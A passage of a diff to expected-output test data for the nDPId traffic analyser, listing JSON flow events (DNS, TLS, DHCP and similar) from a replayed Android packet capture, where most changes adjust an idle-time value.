-01076{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454780612,"flow_last_seen":1582454799515,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454780612,"flow_last_seen":1582454799515,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454779631,"flow_last_seen":1582454799004,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454779631,"flow_last_seen":1582454799004,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872031,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1582454872031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454872031,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8+JhAAEAGvkXAqAIQrNkUTKqEAbsc\/M8rAAAAAKAC\/\/\/0BgAAAgQFtAQCCAr\/\/zezAAAAAAEDAwg="} +01076{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454780612,"flow_last_seen":1582454799515,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454780612,"flow_last_seen":1582454799515,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454779631,"flow_last_seen":1582454799004,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454779631,"flow_last_seen":1582454799004,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871115,"flow_last_seen":1582454871117,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871051,"flow_last_seen":1582454871090,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454784313,"flow_last_seen":1582454866536,"flow_idle_time":180000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":3584,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867034,"flow_last_seen":1582454867075,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"}} -00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454787658,"flow_last_seen":1582454801077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454787658,"flow_last_seen":1582454801077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454787658,"flow_last_seen":1582454801077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454787658,"flow_last_seen":1582454801077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867637,"flow_last_seen":1582454867639,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454870996,"flow_last_seen":1582454870998,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454869517,"flow_last_seen":1582454872012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5382,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454869517,"flow_last_seen":1582454872012,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5382,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454825629,"flow_last_seen":1582454825629,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1582454868348,"flow_last_seen":1582454870097,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5016,"flow_avg_l4_payload_len":228,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871741,"flow_last_seen":1582454872015,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1582454868348,"flow_last_seen":1582454870097,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5016,"flow_avg_l4_payload_len":228,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871741,"flow_last_seen":1582454872015,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871804,"flow_last_seen":1582454871805,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454868462,"flow_last_seen":1582454868503,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"ConnCheck"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1582454867151,"flow_last_seen":1582454867312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":715,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1582454867151,"flow_last_seen":1582454867312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":715,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866407,"flow_last_seen":1582454866538,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.16","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454869361,"flow_last_seen":1582454869363,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454792980,"flow_last_seen":1582454853081,"flow_idle_time":180000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":1530,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} @@ -337,44 +337,44 @@ 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866448,"flow_last_seen":1582454868606,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 